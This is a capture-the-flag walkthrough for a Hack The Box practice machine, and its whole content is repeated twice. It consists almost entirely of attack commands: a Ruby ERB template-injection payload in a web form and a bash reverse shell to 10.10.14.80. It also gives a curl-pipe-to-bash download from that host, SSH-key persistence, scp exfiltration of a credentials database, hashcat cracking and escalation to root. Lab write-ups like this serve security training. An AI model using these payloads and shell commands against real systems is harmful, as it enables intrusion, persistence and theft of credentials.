Mar 19, 2024, 06:45 PM
sudo nmap -sTVC -AO -p- perfection.htb
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx
# In the burpsuite on the "Weighted Grade calculator" Post request there is a SSTI
# link for rrepference: https://book.hacktricks.xyz/pentesting-w...n#erb-ruby
# this returns 49
category1=test%0A<%25%3d+7*7+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20
# Setup a reverseshell in rev.sh 'bash -i >& /dev/tcp/10.10.14.80/4444 0>&1'
# setup listener 'nc -nlvp'
# Curl the request into bash and get your shell
test%0A<%25%3d+`curl+http://10.10.14.80/rev.sh|bash`+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20
# once you have as shell setup persistance by echoing in your public key
echo 'rsa-public-key' > /home/susan/.ssh/authorized_keys
# change permissions on the rsa-public-key
chmod 600 /home/susan/.ssh/authorized_keys
# ssh as susan into the machine
ssh susan@10.10.11.253
# Look around and find a DB file
Migration/pupilpath_credentials.db
# exfil the file
scp susan@perfection.htb:Migration/pupilpath_credentials.db
# read mail
cat /var/spool/mail/susan
#crack passwords
hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
# once you crack susans password switch user to root
sudo su
cat /root/root.txt
Thanks have a nice day!
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx
# In the burpsuite on the "Weighted Grade calculator" Post request there is a SSTI
# link for rrepference: https://book.hacktricks.xyz/pentesting-w...n#erb-ruby
# this returns 49
category1=test%0A<%25%3d+7*7+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20
# Setup a reverseshell in rev.sh 'bash -i >& /dev/tcp/10.10.14.80/4444 0>&1'
# setup listener 'nc -nlvp'
# Curl the request into bash and get your shell
test%0A<%25%3d+`curl+http://10.10.14.80/rev.sh|bash`+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20
# once you have as shell setup persistance by echoing in your public key
echo 'rsa-public-key' > /home/susan/.ssh/authorized_keys
# change permissions on the rsa-public-key
chmod 600 /home/susan/.ssh/authorized_keys
# ssh as susan into the machine
ssh susan@10.10.11.253
# Look around and find a DB file
Migration/pupilpath_credentials.db
# exfil the file
scp susan@perfection.htb:Migration/pupilpath_credentials.db
# read mail
cat /var/spool/mail/susan
#crack passwords
hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
# once you crack susans password switch user to root
sudo su
cat /root/root.txt
Thanks have a nice day!
